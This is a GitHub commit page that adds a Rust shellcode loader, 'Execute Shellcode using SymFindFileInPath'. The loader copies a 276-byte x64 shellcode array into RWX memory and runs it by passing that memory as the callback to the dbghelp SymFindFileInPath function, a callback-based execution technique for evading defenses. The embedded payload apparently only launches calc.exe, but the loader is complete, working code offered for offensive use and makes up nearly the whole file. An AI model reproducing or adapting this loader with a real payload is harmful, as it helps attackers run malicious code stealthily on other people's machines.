Skip to content

Commit 6b3affc

Browse files
authored
Shellcode Exec through SymFindFileInPath
1 parent c8dc629 commit 6b3affc

File tree

1 file changed

+124
-0
lines changed

1 file changed

+124
-0
lines changed

shellcode_exec/SymFindFileInPath.rs

Lines changed: 124 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,124 @@
1+
/*
2+
Execute Shellcode using SymFindFileInPath ..!
3+
By Smukx
4+
*/
5+
6+
use std::{ffi::CString, ptr::{copy_nonoverlapping, null, null_mut}};
7+
8+
use winapi::{
9+
ctypes::c_void,
10+
shared::minwindef::MAX_PATH,
11+
um::{
12+
dbghelp::{SymFindFileInPath, SymInitializeW},
13+
memoryapi::VirtualAlloc,
14+
processthreadsapi::GetCurrentProcess,
15+
winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}
16+
}
17+
};
18+
#[repr(C)]
19+
#[allow(non_camel_case_types)]
20+
pub struct SYMSRV_INDEX_INFO {
21+
pub sizeofstruct: u32,
22+
pub file: [i8; 261],
23+
pub stripped: i32,
24+
pub timestamp: u32,
25+
pub size: u32,
26+
pub dbgfile: [i8; 261],
27+
pub pdbfile: [i8; 261],
28+
pub guid: winapi::shared::guiddef::GUID,
29+
pub sig: u32,
30+
pub age: u32,
31+
}
32+
33+
#[link(name = "dbghelp")] extern "system" {
34+
fn SymSrvGetFileIndexInfo(
35+
file: *const i8,
36+
info: *mut SYMSRV_INDEX_INFO,
37+
flags: u32,
38+
) -> i32;
39+
}
40+
41+
fn main() {
42+
unsafe {
43+
let shellcode: [u8; 276] = [
44+
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
45+
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
46+
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
47+
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
48+
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
49+
0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
50+
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
51+
0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
52+
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
53+
0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
54+
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
55+
0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
56+
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
57+
0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
58+
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
59+
0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
60+
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
61+
0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
62+
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
63+
];
64+
65+
let h_process = GetCurrentProcess();
66+
67+
let address = VirtualAlloc(
68+
null_mut(),
69+
shellcode.len(),
70+
MEM_RESERVE | MEM_COMMIT,
71+
PAGE_EXECUTE_READWRITE,
72+
);
73+
74+
if !address.is_null() {
75+
copy_nonoverlapping(
76+
shellcode.as_ptr(),
77+
address as *mut u8,
78+
shellcode.len(),
79+
);
80+
}
81+
82+
SymInitializeW(
83+
h_process,
84+
null(),
85+
1,
86+
);
87+
88+
let mut finfo: SYMSRV_INDEX_INFO = std::mem::zeroed();
89+
90+
// Unwrap the CString and pass its pointer
91+
92+
let dll_path = CString::new("C:\\windows\\system32\\kernel32.dll").unwrap();
93+
94+
let result = SymSrvGetFileIndexInfo(
95+
dll_path.as_ptr(),
96+
&mut finfo,
97+
0,
98+
);
99+
100+
if result == 0 {
101+
println!("SymSrvGetFileIndexInfo Success!");
102+
} else {
103+
println!("SymSrvGetFileIndexInfo Failed!");
104+
}
105+
106+
let mut dummy = vec![0u8; MAX_PATH as usize];
107+
108+
let search_path = CString::new("c:\\windows\\system32").unwrap();
109+
let filename = CString::new("kernel32.dll").unwrap();
110+
111+
SymFindFileInPath(
112+
h_process,
113+
search_path.as_ptr(),
114+
filename.as_ptr(),
115+
&finfo.timestamp as *const _ as *mut c_void,
116+
finfo.size,
117+
0,
118+
0,
119+
dummy.as_mut_ptr() as *mut i8,
120+
Some(std::mem::transmute(address)),
121+
null_mut(),
122+
);
123+
}
124+
}

0 commit comments

Comments
 (0)